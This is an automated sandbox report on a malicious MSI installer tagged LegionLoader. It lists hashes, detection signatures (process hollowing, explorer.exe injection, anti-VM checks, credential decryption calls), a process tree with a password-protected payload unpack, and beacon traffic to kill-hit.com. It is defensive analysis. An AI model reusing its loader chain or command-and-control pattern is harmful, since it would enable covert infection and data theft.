Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K064a7Rfk7.msi

Overview

General Information

Sample name:K064a7Rfk7.msi
renamed because original name is a hash value
Original sample name:b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe.msi
Analysis ID:1591347
MD5:32af5cfab7bb87beedb521de43837347
SHA1:2f128db2405dd0362ce55629816dc8bbe83c0478
SHA256:b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe
Tags:kill-hit-comLegionLoadermsiuser-johnk3r
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 5892 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2680 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5356 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • UnRar.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\" MD5: 98CCD44353F7BC5BAD1BC6BA9AE0CD68)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • obs-ffmpeg-mux.exe (PID: 1836 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe" MD5: D3CAC4D7B35BACAE314F48C374452D71)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 524 cmdline: C:\Windows\SysWOW64\explorer.exe explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • WerFault.exe (PID: 2988 cmdline: C:\Windows\system32\WerFault.exe -u -p 1836 -s 256 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • createdump.exe (PID: 6060 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe" MD5: 71F796B486C7FAF25B9B16233A7CE0CD)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dllReversingLabs: Detection: 24%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C01940 SHGetKnownFolderPath,CreateFileA,GetFileSize,ReadFile,CloseHandle,lstrlenA,lstrcpyA,Concurrency::cancel_current_task,CryptUnprotectData,LocalFree,11_2_00C01940
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C01E80 CryptUnprotectData,LocalFree,Concurrency::cancel_current_task,11_2_00C01E80
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}Jump to behavior
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.2.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.2.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.2.dr
Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.2.dr
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb source: utest.dll.2.dr
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: K064a7Rfk7.msi
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338386873.00007FFDAC131000.00000002.00000001.01000000.0000000C.sdmp, vcruntime140.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb((! source: utest.dll.2.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.2.dr
Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: obs-ffmpeg-mux.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp, obs-ffmpeg-mux.exe, 00000007.00000000.2304470611.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb;;;GCTL source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\Projects\WinRAR\rar\build\unrar64\Release\UnRAR.pdb source: UnRar.exe, 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp, UnRar.exe, 00000005.00000000.2292652385.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: K064a7Rfk7.msi
Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdbUGP source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.2.dr
Source: Binary string: w32-pthreads.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338942242.00007FFDAC148000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: K064a7Rfk7.msi, MSIE1FA.tmp.2.dr, MSIE336.tmp.2.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCCED8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACCCED8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACFF850 FindFirstFileExA,5_2_00007FF7AACFF850
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A430 TryEnterCriticalSection,TerminateThread,SetThreadpoolStackInformation,SetConsoleHistoryInfo,PrefetchVirtualMemory,GetQueuedCompletionStatusEx,SystemTimeToFileTime,GetExitCodeProcess,CreateSymbolicLinkTransactedW,FindFirstFileW,LoadModule,OpenFile,OpenThread,SetFileTime,WaitForThreadpoolWorkCallbacks,FreeLibraryAndExitThread,PowerCreateRequest,InterlockedPushListSListEx,LocalFileTimeToFileTime,FindCloseChangeNotification,CreateThreadpoolCleanupGroup,QueryFullProcessImageNameW,Wow64GetThreadSelectorEntry,IsValidNLSVersion,FreeLibraryAndExitThread,CreateEventExW,SetPriorityClass,IsValidNLSVersion,RegisterApplicationRecoveryCallback,GetFileSize,GlobalFree,GetFileMUIInfo,SetConsoleActiveScreenBuffer,LCIDToLocaleName,7_2_00007FFDA378A430
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785730 SetFocus,CreateFileTransactedW,GetWindowContextHelpId,VirtualAlloc,FindNextVolumeMountPointW,OpenWaitableTimerW,FindNextStreamW,AddSIDToBoundaryDescriptor,EnterCriticalSection,DeleteSynchronizationBarrier,RemoveDirectoryTransactedW,LogicalToPhysicalPoint,OpenClipboard,SetWindowRgn,GetCommProperties,ShowCursor,GetFileBandwidthReservation,VirtualAlloc,GetProcessHeap,DeleteTimerQueueTimer,WriteTapemark,GlobalHandle,SetStdHandle,CreateTimerQueueTimer,GetProcessVersion,ReadConsoleOutputW,FindFirstFileW,GetProcessVersion,GetConsoleTitleW,HeapAlloc,7_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37872D0 RegisterClassW,CreateWindowExW,ShowWindow,UpdateWindow,FindFirstFileW,FindClose,GetTempPathW,GetFileAttributesW,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,CreateSolidBrush,FillRect,DeleteObject,GetObjectW,GetDIBits,SelectObject,DeleteDC,DeleteObject,CreateDirectoryW,type_info::_name_internal_method,GetMessageW,TranslateMessage,DispatchMessageW,7_2_00007FFDA37872D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38345D4 FindFirstFileExW,7_2_00007FFDA38345D4
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C12159 FindFirstFileExW,11_2_00C12159
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 4x nop then push rbx7_2_00007FFD937546C0

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.37.86 80Jump to behavior
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global trafficHTTP traffic detected: GET /front.php?a=yrJh28ExgsVYO0Y&id=0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like GeckoHost: kill-hit.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C049A0 ExitProcess,CreateThread,URLDownloadToFileA,GetFileAttributesA,Sleep,GetTempPathA,wsprintfA,GetFileAttributesA,CreateDirectoryA,wsprintfA,lstrlenA,lstrcpyA,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateFileA,WriteFile,CloseHandle,GetLastError,GetLastError,GetFileAttributesA,MoveFileA,GetLastError,GetLastError,ShellExecuteA,GetLastError,GetLastError,DeleteFileA,GetLastError,GetLastError,wsprintfA,lstrlenA,lstrcpyA,lstrlenA,GetProcessHeap,HeapFree,WaitForSingleObject,VirtualFree,11_2_00C049A0
Source: global trafficHTTP traffic detected: GET /front.php?a=yrJh28ExgsVYO0Y&id=0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like GeckoHost: kill-hit.com
Source: global trafficDNS traffic detected: DNS query: kill-hit.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 21:27:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1tExApGNYzAAe%2BXeFIaydJZgdXwrYVyTVXvU5%2FKFzlFeL%2B2u7M08AVPxEAw6uAx7uzWDHfCnheNt5rmUf2H4wIkK%2FhpltS0cTPPCT5mdMzKd5sSvJXluCzvdRL9CfjI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9020b5befc84ab2d-YYZserver-timing: cfL4;desc="?proto=TCP&rtt=14191&min_rtt=14191&rtt_var=7095&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: utest.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: utest.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: K064a7Rfk7.msiString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: utest.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: K064a7Rfk7.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: utest.dll.2.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: K064a7Rfk7.msiString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: utest.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: utest.dll.2.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: K064a7Rfk7.msiString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0K
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 00000007.00000002.2316007345.00007FFD902DB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://dashif.org/guidelines/trickmode
Source: explorer.exe, 0000000B.00000002.2323519946.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kill-hit.com/Y
Source: explorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0
Source: explorer.exe, 0000000B.00000002.2323519946.000000000077F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=02Z
Source: explorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0S
Source: explorer.exe, 0000000B.00000002.2323519946.000000000077F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kill-hit.com:80/front.php?a=yrJh28ExgsVYO0Y&id=0
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
Source: utest.dll.2.drString found in binary or memory: http://ocsp.digicert.com0H
Source: utest.dll.2.drString found in binary or memory: http://ocsp.digicert.com0I
Source: K064a7Rfk7.msiString found in binary or memory: http://ocsp.digicert.com0K
Source: K064a7Rfk7.msiString found in binary or memory: http://ocsp.digicert.com0N
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
Source: K064a7Rfk7.msiString found in binary or memory: http://schemas.mic
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2316007345.00007FFD902DB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-DASH_schema_files/DASH-MPD.xsd
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
Source: utest.dll.2.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: avcodec-60.dll.2.drString found in binary or memory: http://www.videolan.org/x264.html
Source: K064a7Rfk7.msiString found in binary or memory: https://aka.ms/winui2/webview2download/Reload():
Source: utest.dll.2.drString found in binary or memory: https://github.com/google/googletest/
Source: utest.dll.2.drString found in binary or memory: https://github.com/google/googletest/blob/master/googlemock/docs/CookBook.md#knowing-when-to-expect
Source: classes.jsa.2.drString found in binary or memory: https://java.oracle.com/
Source: obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 00000007.00000002.2334570142.00007FFD93796000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://streams.videolan.org/upload/
Source: K064a7Rfk7.msi, utest.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785730 SetFocus,CreateFileTransactedW,GetWindowContextHelpId,VirtualAlloc,FindNextVolumeMountPointW,OpenWaitableTimerW,FindNextStreamW,AddSIDToBoundaryDescriptor,EnterCriticalSection,DeleteSynchronizationBarrier,RemoveDirectoryTransactedW,LogicalToPhysicalPoint,OpenClipboard,SetWindowRgn,GetCommProperties,ShowCursor,GetFileBandwidthReservation,VirtualAlloc,GetProcessHeap,DeleteTimerQueueTimer,WriteTapemark,GlobalHandle,SetStdHandle,CreateTimerQueueTimer,GetProcessVersion,ReadConsoleOutputW,FindFirstFileW,GetProcessVersion,GetConsoleTitleW,HeapAlloc,7_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCC148: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACCC148
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE2740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx,5_2_00007FF7AACE2740
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\41d8ef.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0DE.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE18B.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1CA.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FA.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE249.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE289.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE336.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A5.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\41d8f2.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\41d8f2.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE0DE.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC6BDC5_2_00007FF7AACC6BDC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDAFB45_2_00007FF7AACDAFB4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB5D285_2_00007FF7AACB5D28
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACEAEC45_2_00007FF7AACEAEC4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC63AC5_2_00007FF7AACC63AC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCD8145_2_00007FF7AACCD814
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCC5F45_2_00007FF7AACCC5F4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDD6D45_2_00007FF7AACDD6D4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE9B885_2_00007FF7AACE9B88
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACBEB1C5_2_00007FF7AACBEB1C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDCC785_2_00007FF7AACDCC78
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC5C505_2_00007FF7AACC5C50
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE89F85_2_00007FF7AACE89F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AAD029C05_2_00007FF7AAD029C0
